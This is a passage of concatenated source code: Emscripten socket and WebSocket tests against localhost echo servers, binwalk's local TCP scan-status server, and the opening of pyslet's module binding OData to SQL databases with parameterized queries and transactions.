message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = test_file('sockets/test_sockets_echo_client.c')
input = read_file(input_filename)
create_file('test_sockets_echo_bigdata.c', input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message))
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest('test_sockets_echo_bigdata.c', expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_partial_client.c'), assert_returncode=165, args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(test_file('sockets/test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + test_file('sockets')
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(test_file('sockets/test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(test_file('third_party', 'enet'), 'enet')
with utils.chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure', '--disable-shared'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
for harness in [
CompiledServerHarness(test_file('sockets/test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(test_file('sockets/test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
if config.NODE_JS not in config.JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + test_file('sockets')
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
expected = 'do_msg_read: read 14 bytes'
self.do_runf(test_file('sockets/test_sockets_echo_client.c'), expected, emcc_args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '-sSOCKET_DEBUG', '-sWEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
create_file('websocket_pre.js', '''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js=websocket_pre.js', '-sSOCKET_DEBUG', '-DSOCKK=12345'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest(test_file('websocket/test_websocket_send.c'), expected='101', args=['-lwebsocket', '-sNO_EXIT_RUNTIME', '-sWEBSOCKET_DEBUG'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools/websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest(test_file('websocket/tcp_echo_client.cpp'), expected='101', args=['-lwebsocket', '-sPROXY_POSIX_SOCKETS', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
|
statuserver.py
|
# Provides scan status information via a TCP socket service.
# Currently only works for signature scans.
import time
import errno
import threading
import binwalk.core.compat
# Python 2/3 compatibility
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
class StatusRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
message_format = "%s %3d%% [ %d / %d ]"
last_status_message_len = 0
status_message = ''
message_sent = False
self.server.binwalk.status.running = True
while True:
time.sleep(0.1)
try:
self.request.send(binwalk.core.compat.str2bytes('\b' * last_status_message_len))
self.request.send(binwalk.core.compat.str2bytes(' ' * last_status_message_len))
self.request.send(binwalk.core.compat.str2bytes('\b' * last_status_message_len))
if self.server.binwalk.status.shutdown:
self.server.binwalk.status.finished = True
break
if self.server.binwalk.status.total != 0:
percentage = ((float(self.server.binwalk.status.completed) / float(self.server.binwalk.status.total)) * 100)
status_message = message_format % (self.server.binwalk.status.fp.path,
percentage,
self.server.binwalk.status.completed,
self.server.binwalk.status.total)
elif not message_sent:
status_message = "No status information available at this time!"
else:
continue
last_status_message_len = len(status_message)
self.request.send(binwalk.core.compat.str2bytes(status_message))
message_sent = True
except IOError as e:
if e.errno == errno.EPIPE:
break
except Exception as e:
binwalk.core.common.debug('StatusRequestHandler exception: ' + str(e) + '\n')
except KeyboardInterrupt as e:
raise e
self.server.binwalk.status.running = False
return
class ThreadedStatusServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
daemon_threads = True
allow_reuse_address = True
class StatusServer(object):
def __init__(self, port, binwalk):
self.server = ThreadedStatusServer(('127.0.0.1', port), StatusRequestHandler)
self.server.binwalk = binwalk
t = threading.Thread(target=self.server.serve_forever)
t.setDaemon(True)
t.start()
|
sqlds.py
|
#! /usr/bin/env python
"""Binds the OData API to the Python DB API."""
import decimal
import hashlib
import io
import itertools
import logging
import math
import os.path
import sqlite3
import sys
import threading
import time
import traceback
import warnings
from .. import blockstore
from .. import iso8601 as iso
from ..http import params
from ..py2 import (
buffer2,
dict_items,
dict_values,
is_text,
range3,
to_text)
from ..vfs import OSFilePath
from . import core
from . import csdl as edm
from . import metadata as edmx
logging = logging.getLogger('pyslet.odata2.sqlds')
# : the standard timeout while waiting for a database connection, in seconds
SQL_TIMEOUT = 90
class SQLError(Exception):
"""Base class for all module exceptions."""
pass
class DatabaseBusy(SQLError):
"""Raised when a database connection times out."""
pass
SQLOperatorPrecedence = {
',': 0,
'OR': 1,
'AND': 2,
'NOT': 3,
'=': 4,
'<>': 4,
'<': 4,
'>': 4,
'<=': 4,
'>=': 4,
'LIKE': 4,
'+': 5,
'-': 5,
'*': 6,
'/': 6
}
"""Look-up table for SQL operator precedence calculations.
The keys are strings representing the operator, the values are
integers that allow comparisons for operator precedence. For
example::
SQLOperatorPrecedence['+']<SQLOperatorPrecedence['*']
SQLOperatorPrecedence['<']==SQLOperatorPrecedence['>']"""
class UnparameterizedLiteral(core.LiteralExpression):
"""Class used as a flag that this literal is safe and does not need
to be parameterized.
This is used in the query converter to prevent things like this
happening when the converter itself constructs a LIKE expression::
"name" LIKE ?+?+? ; params=['%', "Smith", '%']"""
pass
class SQLParams(object):
"""An abstract class used to build parameterized queries.
Python's DB API supports three different conventions for specifying
parameters and each module indicates the convention in use. The SQL
construction methods in this module abstract away this variability
for maximum portability using different implementations of the basic
SQLParams class."""
def __init__(self):
# : an object suitable for passing to DB API's execute method
self.params = None
def add_param(self, value):
"""Adds a value to this set of parameters
Returns the string to include in the query in place of this
value.
value:
The native representation of the value in a format
suitable for passing to the underlying DB API."""
raise NotImplementedError
@classmethod
def escape_literal(cls, literal):
"""Escapes a literal string, returning the escaped version
This method is only used to escape characters that are
interpreted specially by the parameter substitution system. For
example, if the parameters are being substituted using python's
% operator then the '%' sign needs to be escaped (by doubling)
in the output.
This method has nothing to do with turning python values into
SQL escaped literals, that task is always deferred to the
underlying DB module to prevent SQL injection attacks.
The default implementation does nothing, in most cases that is
the correct thing to do."""
return literal
class QMarkParams(SQLParams):
"""A class for building parameter lists using '?' syntax."""
def __init__(self):
super(QMarkParams, self).__init__()
self.params = []
def add_param(self, value):
self.params.append(value)
return "?"
class FormatParams(SQLParams):
"""A class for building parameter lists using '%s' syntax."""
def __init__(self):
super(FormatParams, self).__init__()
self.params = []
def add_param(self, value):
self.params.append(value)
return "%s"
@classmethod
def escape_literal(cls, literal):
"""Doubles any % characters to prevent formatting errors"""
return literal.replace("%", "%%")
class NumericParams(SQLParams):
"""A class for building parameter lists using ':1', ':2',... syntax"""
def __init__(self):
super(NumericParams, self).__init__()
self.params = []
def add_param(self, value):
self.params.append(value)
return ":%i" % len(self.params)
class NamedParams(SQLParams):
"""A class for building parameter lists using ':A', ':B",... syntax
Although there is more freedom with named parameters, in order to
support the ordered lists of the other formats we just invent
parameter names using ':p0', ':p1', etc."""
def __init__(self):
super(NamedParams, self).__init__()
self.params = {}
def add_param(self, value):
name = "p%i" % len(self.params)
self.params[name] = value
return ":" + name
def retry_decorator(tmethod):
"""Decorates a transaction method with retry handling"""
def retry(self, *args, **kwargs):
if self.query_count:
return tmethod(self, *args, **kwargs)
else:
strike = 0
while True:
try:
result = tmethod(self, *args, **kwargs)
break
except self.api.OperationalError as err:
strike += 1
if strike < 3:
logging.error(
"Thread[%i] retrying database connection "
"after error: %s", self.connection.thread_id,
str(err))
self.container.close_connection(self.connection.dbc)
self.connection.dbc = self.container.open()
if self.cursor is not None:
# create a new cursor
self.cursor = self.connection.dbc.cursor()
else:
raise
return result
return retry
class SQLTransaction(object):
"""Class used to model a transaction.
Python's DB API uses transactions by default, hiding the details from
the caller. Essentially, the first execute call on a connection issues
a BEGIN statement and the transaction ends with either a commit or a
rollback. It is generally considered a bad idea to issue a SQL command
and then leave the connection with an open transaction.
The purpose of this class is to help us write methods that can
operate either as a single transaction or as part of sequence of
methods that form a single transaction. It also manages cursor
creation and closing and logging.
Essentially, the class is used as follows::
t = SQLTransaction(db_container, db_connection)
try:
t.begin()
t.execute("UPDATE SOME_TABLE SET SOME_COL='2'")
t.commit()
except Exception as e:
t.rollback(e)
finally:
t.close(e)
The transaction object can be passed to a sub-method between the
begin and commit calls provided that method follows the same pattern
as the above for the try, except and finally blocks. The object
keeps track of these 'nested' transactions and delays the commit or
rollback until the outermost method invokes them."""
def __init__(self, container, connection):
self.container = container
self.api = container.dbapi #: the database module
self.connection = connection #: the database connection
#: the database cursor to use for executing commands
self.cursor = None
self.no_commit = 0 #: used to manage nested transactions
self.query_count = 0 #: records the number of successful commands
@retry_decorator
def begin(self):
"""Begins a transaction
If a transaction is already in progress a nested transaction is
started which has no affect on the database connection itself."""
if self.cursor is None:
self.cursor = self.connection.dbc.cursor()
else:
self.no_commit += 1
@retry_decorator
def execute(self, sqlcmd, params=None):
"""Executes *sqlcmd* as part of this transaction.
sqlcmd
A string containing the query
params
A :py:class:`SQLParams` object containing any
parameterized values."""
self.cursor.execute(sqlcmd,
params.params if params is not None else None)
self.query_count += 1
def commit(self):
"""Ends this transaction with a commit
Nested transactions do nothing."""
if self.no_commit:
return
self.connection.dbc.commit()
def rollback(self, err=None, swallow=False):
"""Calls the underlying database connection rollback method.
Nested transactions do not rollback the connection, they do
nothing except re-raise *err* (if required).
If rollback is not supported the resulting error is absorbed.
err
The exception that triggered the rollback. If not None then
this is logged at INFO level when the rollback succeeds.
If the transaction contains at least one successfully
executed query and the rollback fails then *err* is logged
at ERROR rather than INFO level indicating that the data may
now be in violation of the model.
swallow
A flag (defaults to False) indicating that *err* should be
swallowed, rather than re-raised."""
if not self.no_commit:
try:
self.connection.dbc.rollback()
if err is not None:
logging.info(
"rollback invoked for transaction following error %s",
str(err))
except self.api.NotSupportedError:
if err is not None:
if self.query_count:
logging.error(
"Data Integrity Error on TABLE %s: rollback "
"invoked on a connection that does not "
"support transactions after error %s",
self.table_name,
str(err))
else:
logging.info(
"Query failed following error %s", str(err))
pass
if err is not None and not swallow:
logging.debug(
' '.join(
traceback.format_exception(*sys.exc_info(), limit=6)))
if isinstance(err, self.api.Error):
raise SQLError(str(err))
else:
raise err
def close(self):
"""Closes this transaction after a rollback or commit.
Each call to :py:meth:`begin` MUST be balanced with one call to
close."""
if self.no_commit:
self.no_commit = self.no_commit - 1
elif self.cursor is not None:
self.cursor.close()
self.cursor = None
self.query_count = 0
class SQLCollectionBase(core.EntityCollection):
"""A base class to provide core SQL functionality.
Additional keyword arguments:
container
A :py:class:`SQLEntityContainer` instance.
On construction a data connection is acquired from *container*, this
may prevent other threads from using the database until the lock is
released by the :py:meth:`close` method."""
def __init__(self, container, **kwargs):
super(SQLCollectionBase, self).__init__(**kwargs)
#: the parent container (database) for this collection
self.container = container
# the quoted table name containing this collection
self.table_name = self.container.mangled_names[(self.entity_set.name,)]
self.auto_keys = False
for k in self.entity_set.keys:
source_path = (self.entity_set.name, k)
if source_path in self.container.ro_names:
self.auto_keys = True
self._joins = None
# force orderNames to be initialised
self.set_orderby(None)
#: a connection to the database acquired with
#: :meth:`SQLEntityContainer.acquire_connection`
self.connection = None
self._sqlLen = None
self._sqlGen = None
try:
self.connection = self.container.acquire_connection(SQL_TIMEOUT)
if self.connection is None:
raise DatabaseBusy(
"Failed to acquire connection after %is" % SQL_TIMEOUT)
except:
self.close()
raise
def close(self):
"""Closes the cursor and database connection if they are open."""
if self.connection is not None:
self.container.release_connection(self.connection)
self.connection = None
def __len__(self):
if self._sqlLen is None:
query = ["SELECT COUNT(*) FROM %s" % self.table_name]
params = self.container.ParamsClass()
where = self.where_clause(None, params)
query.append(self.join_clause())
query.append(where)
query = ''.join(query)
self._sqlLen = (query, params)
else:
query, params = self._sqlLen
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
# get the result
result = transaction.cursor.fetchone()[0]
# we haven't changed the database, but we don't want to
# leave the connection idle in transaction
transaction.commit()
return result
except Exception as e:
# we catch (almost) all exceptions and re-raise after rollback
transaction.rollback(e)
finally:
transaction.close()
def entity_generator(self):
entity, values = None, None
if self._sqlGen is None:
entity = self.new_entity()
query = ["SELECT "]
params = self.container.ParamsClass()
column_names, values = zip(*list(self.select_fields(entity)))
# values is used later for the first result
column_names = list(column_names)
self.orderby_cols(column_names, params)
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
# we force where and orderby to be calculated before the
# join clause is added as they may add to the joins
where = self.where_clause(
None, params, use_filter=True, use_skip=False)
orderby = self.orderby_clause()
query.append(self.join_clause())
query.append(where)
query.append(orderby)
query = ''.join(query)
self._sqlGen = query, params
else:
query, params = self._sqlGen
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
while True:
row = transaction.cursor.fetchone()
if row is None:
break
if entity is None:
entity = self.new_entity()
values = next(
itertools.islice(
zip(*list(self.select_fields(entity))), 1, None))
for value, new_value in zip(values, row):
self.container.read_sql_value(value, new_value)
entity.exists = True
yield entity
entity, values = None, None
# we haven't changed the database, but we don't want to
# leave the connection idle in transaction
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def itervalues(self):
return self.expand_entities(
self.entity_generator())
def set_page(self, top, skip=0, skiptoken=None):
"""Sets the values for paging.
Our implementation uses a special format for *skiptoken*. It is
a comma-separated list of simple literal values corresponding to
the values required by the ordering augmented with the key
values to ensure uniqueness.
For example, if $orderby=A,B on an entity set with key K then
the skiptoken will typically have three values comprising the
last values returned for A,B and K in that order. In cases
where the resulting skiptoken would be unreasonably large an
additional integer (representing a further skip) may be appended
and the whole token expressed relative to an earlier skip
point."""
self.top = top
self.skip = skip
if skiptoken is None:
self.skiptoken = None
else:
# parse a sequence of literal values
p = core.Parser(skiptoken)
self.skiptoken = []
while True:
p.parse_wsp()
self.skiptoken.append(
p.require_production(p.parse_uri_literal()))
p.parse_wsp()
if not p.parse(','):
if p.match_end():
break
else:
raise core.InvalidSystemQueryOption(
"Unrecognized $skiptoken: %s" % skiptoken)
if self.orderby is None:
order_len = 0
else:
order_len = len(self.orderby)
if (len(self.skiptoken) ==
order_len + len(self.entity_set.keys) + 1):
# the last value must be an integer we add to skip
if isinstance(self.skiptoken[-1], edm.Int32Value):
self.skip += self.skiptoken[-1].value
self.skiptoken = self.skiptoken[:-1]
else:
raise core.InvalidSystemQueryOption(
"skiptoken incompatible with ordering: %s" % skiptoken)
elif len(self.skiptoken) != order_len + len(self.entity_set.keys):
raise core.InvalidSystemQueryOption(
"skiptoken incompatible with ordering: %s" % skiptoken)
self.nextSkiptoken = None
def next_skiptoken(self):
if self.nextSkiptoken:
token = []
for t in self.nextSkiptoken:
token.append(core.ODataURI.format_literal(t))
return ",".join(token)
else:
return None
def page_generator(self, set_next=False):
if self.top == 0:
# end of paging
return
skip = self.skip
top = self.top
topmax = self.topmax
if topmax is not None:
if top is not None:
limit = min(top, topmax)
else:
limit = topmax
else:
limit = top
entity = self.new_entity()
query = ["SELECT "]
skip, limit_clause = self.container.select_limit_clause(skip, limit)
if limit_clause:
query.append(limit_clause)
params = self.container.ParamsClass()
column_names, values = zip(*list(self.select_fields(entity)))
column_names = list(column_names)
self.orderby_cols(column_names, params, True)
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
where = self.where_clause(None, params, use_filter=True, use_skip=True)
orderby = self.orderby_clause()
query.append(self.join_clause())
query.append(where)
query.append(orderby)
skip, limit_clause = self.container.limit_clause(skip, limit)
if limit_clause:
query.append(limit_clause)
query = ''.join(query)
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
while True:
row = transaction.cursor.fetchone()
if row is None:
# no more pages
if set_next:
self.top = self.skip = 0
self.skipToken = None
break
if skip:
skip = skip - 1
continue
if entity is None:
entity = self.new_entity()
values = next(
itertools.islice(
zip(*list(self.select_fields(entity))), 1, None))
row_values = list(row)
for value, new_value in zip(values, row_values):
self.container.read_sql_value(value, new_value)
entity.exists = True
yield entity
if topmax is not None:
topmax = topmax - 1
if topmax < 1:
# this is the last entity, set the nextSkiptoken
order_values = row_values[-len(self.orderNames):]
self.nextSkiptoken = []
for v in order_values:
self.nextSkiptoken.append(
self.container.new_from_sql_value(v))
tokenlen = 0
for v in self.nextSkiptoken:
if v and isinstance(v, (edm.StringValue,
edm.BinaryValue)):
tokenlen += len(v.value)
# a really large skiptoken is no use to anyone
if tokenlen > 512:
# ditch this one, copy the previous one and add a
# skip
self.nextSkiptoken = list(self.skiptoken)
v = edm.Int32Value()
v.set_from_value(self.topmax)
self.nextSkiptoken.append(v)
if set_next:
self.skiptoken = self.nextSkiptoken
self.skip = 0
break
if top is not None:
top = top - 1
if top < 1:
if set_next:
if self.skip is not None:
self.skip = self.skip + self.top
else:
self.skip = self.top
break
entity = None
# we haven't changed the database, but we don't want to
# leave the connection idle in transaction
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def iterpage(self, set_next=False):
return self.expand_entities(
self.page_generator(set_next))
def __getitem__(self, key):
entity = self.new_entity()
entity.set_key(key)
params = self.container.ParamsClass()
query = ["SELECT "]
column_names, values = zip(*list(self.select_fields(entity)))
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
where = self.where_clause(entity, params)
query.append(self.join_clause())
query.append(where)
query = ''.join(query)
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
row = transaction.cursor.fetchone()
if rowcount == 0 or row is None:
raise KeyError
elif rowcount > 1 or (rowcount == -1 and
transaction.cursor.fetchone() is not None):
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key: %s" % repr(key))
for value, new_value in zip(values, row):
self.container.read_sql_value(value, new_value)
entity.exists = True
entity.expand(self.expand, self.select)
transaction.commit()
return entity
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def read_stream(self, key, out=None):
entity = self.new_entity()
entity.set_key(key)
svalue = self._get_streamid(key)
sinfo = core.StreamInfo()
if svalue:
estream = self.container.streamstore.get_stream(svalue.value)
sinfo.type = params.MediaType.from_str(estream['mimetype'].value)
sinfo.created = estream['created'].value.with_zone(0)
sinfo.modified = estream['modified'].value.with_zone(0)
sinfo.size = estream['size'].value
sinfo.md5 = estream['md5'].value
else:
estream = None
sinfo.size = 0
sinfo.md5 = hashlib.md5(b'').digest()
if out is not None and svalue:
with self.container.streamstore.open_stream(estream, 'r') as src:
actual_size, actual_md5 = self._copy_src(src, out)
if sinfo.size is not None and sinfo.size != actual_size:
# unexpected size mismatch
raise SQLError("stream size mismatch on read %s" %
entity.get_location())
if sinfo.md5 is not None and sinfo.md5 != actual_md5:
# md5 mismatch
raise SQLError("stream checksum mismatch on read %s" %
entity.get_location())
return sinfo
def read_stream_close(self, key):
entity = self.new_entity()
entity.set_key(key)
svalue = self._get_streamid(key)
sinfo = core.StreamInfo()
if svalue:
estream = self.container.streamstore.get_stream(svalue.value)
sinfo.type = params.MediaType.from_str(estream['mimetype'].value)
sinfo.created = estream['created'].value.with_zone(0)
sinfo.modified = estream['modified'].value.with_zone(0)
sinfo.size = estream['size'].value
sinfo.md5 = estream['md5'].value
return sinfo, self._read_stream_gen(estream, sinfo)
else:
estream = None
sinfo.size = 0
sinfo.md5 = hashlib.md5('').digest()
self.close()
return sinfo, []
def _read_stream_gen(self, estream, sinfo):
try:
with self.container.streamstore.open_stream(estream, 'r') as src:
h = hashlib.md5()
count = 0
while True:
data = src.read(io.DEFAULT_BUFFER_SIZE)
if len(data):
count += len(data)
h.update(data)
yield data
else:
break
if sinfo.size is not None and sinfo.size != count:
# unexpected size mismatch
raise SQLError("stream size mismatch on read [%i]" %
estream.key())
if sinfo.md5 is not None and sinfo.md5 != h.digest():
# md5 mismatch
raise SQLError("stream checksum mismatch on read [%i]" %
estream.key())
finally:
self.close()
def update_stream(self, src, key, sinfo=None):
e = self.new_entity()
e.set_key(key)
if sinfo is None:
sinfo = core.StreamInfo()
etag = e.etag_values()
if len(etag) == 1 and isinstance(etag[0], edm.BinaryValue):
h = hashlib.sha256()
etag = etag[0]
else:
h = None
c, v = self.stream_field(e, prefix=False)
if self.container.streamstore:
# spool the data into the store and store the stream key
estream = self.container.streamstore.new_stream(sinfo.type,
sinfo.created)
with self.container.streamstore.open_stream(estream, 'w') as dst:
sinfo.size, sinfo.md5 = self._copy_src(src, dst, sinfo.size, h)
if sinfo.modified is not None:
# force modified date based on input
estream['modified'].set_from_value(
sinfo.modified.shift_zone(0))
estream.commit()
v.set_from_value(estream.key())
else:
raise NotImplementedError
if h is not None:
etag.set_from_value(h.digest())
oldvalue = self._get_streamid(key)
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
# store the new stream value for the entity
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
query.append(
"%s=%s" %
(c, params.add_param(self.container.prepare_sql_value(v))))
query.append(' WHERE ')
where = []
for k, kv in dict_items(e.key_dict()):
where.append(
'%s=%s' %
(self.container.mangled_names[(self.entity_set.name, k)],
params.add_param(self.container.prepare_sql_value(kv))))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
except Exception as e:
# we allow the stream store to re-use the same database but
# this means we can't transact on both at once (from the
# same thread) - settle for logging at the moment
# self.container.streamstore.delete_stream(estream)
logging.error("Orphan stream created %s[%i]",
estream.entity_set.name, estream.key())
transaction.rollback(e)
finally:
transaction.close()
# now remove the old stream
if oldvalue:
oldstream = self.container.streamstore.get_stream(oldvalue.value)
self.container.streamstore.delete_stream(oldstream)
def _get_streamid(self, key, transaction=None):
entity = self.new_entity()
entity.set_key(key)
params = self.container.ParamsClass()
query = ["SELECT "]
sname, svalue = self.stream_field(entity)
query.append(sname)
query.append(' FROM ')
query.append(self.table_name)
query.append(self.where_clause(entity, params, use_filter=False))
query = ''.join(query)
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
row = transaction.cursor.fetchone()
if rowcount == 0 or row is None:
raise KeyError
elif rowcount > 1 or (rowcount == -1 and
transaction.cursor.fetchone() is not None):
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key: %s" % repr(key))
self.container.read_sql_value(svalue, row[0])
entity.exists = True
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
return svalue
def _copy_src(self, src, dst, max_bytes=None, xhash=None):
md5 = hashlib.md5()
rbytes = max_bytes
count = 0
while rbytes is None or rbytes > 0:
if rbytes is None:
data = src.read(io.DEFAULT_BUFFER_SIZE)
else:
data = src.read(min(rbytes, io.DEFAULT_BUFFER_SIZE))
rbytes -= len(data)
if not data:
# we're done
break
# add the data to the hash
md5.update(data)
if xhash is not None:
xhash.update(data)
while data:
wbytes = dst.write(data)
if wbytes is None:
if not isinstance(dst, io.RawIOBase):
wbytes = len(data)
else:
wbytes = 0
time.sleep(0) # yield to prevent hard loop
if wbytes < len(data):
data = data[wbytes:]
else:
data = None
count += wbytes
return count, md5.digest()
def reset_joins(self):
"""Sets the base join information for this collection"""
self._joins = {}
self._aliases = set()
self._aliases.add(self.table_name)
def next_alias(self):
i = len(self._aliases)
while True:
alias = "nav%i" % i
if alias in self._aliases:
i += 1
else:
break
return alias
def add_join(self, name):
"""Adds a join to this collection
name
The name of the navigation property to traverse.
The return result is the alias name to use for the target table.
As per the specification, the target must have multiplicity 1 or
0..1."""
if self._joins is None:
self.reset_joins()
elif name in self._joins:
return self._joins[name][0]
alias = self.next_alias()
src_multiplicity, dst_multiplicity = \
self.entity_set.get_multiplicity(name)
if dst_multiplicity not in (edm.Multiplicity.ZeroToOne,
edm.Multiplicity.One):
# we can't join on this navigation property
raise NotImplementedError(
"NavigationProperty %s.%s cannot be used in an expression" %
(self.entity_set.name, name))
fk_mapping = self.container.fk_table[self.entity_set.name]
link_end = self.entity_set.navigation[name]
target_set = self.entity_set.get_target(name)
target_table_name = self.container.mangled_names[(target_set.name, )]
join = []
if link_end in fk_mapping:
# we own the foreign key
for key_name in target_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name, self.container.mangled_names[
(self.entity_set.name, link_end.parent.name,
key_name)],
alias,
self.container.mangled_names[
(target_set.name, key_name)]))
join = ' LEFT JOIN %s AS %s ON %s' % (
target_table_name, alias, ' AND '.join(join))
self._joins[name] = (alias, join)
self._aliases.add(alias)
else:
target_fk_mapping = self.container.fk_table[target_set.name]
if link_end.otherEnd in target_fk_mapping:
# target table has the foreign key
for key_name in self.entity_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name, self.container.mangled_names[
(self.entity_set.name, key_name)],
alias,
self.container.mangled_names[
(target_set.name,
link_end.parent.name, key_name)]))
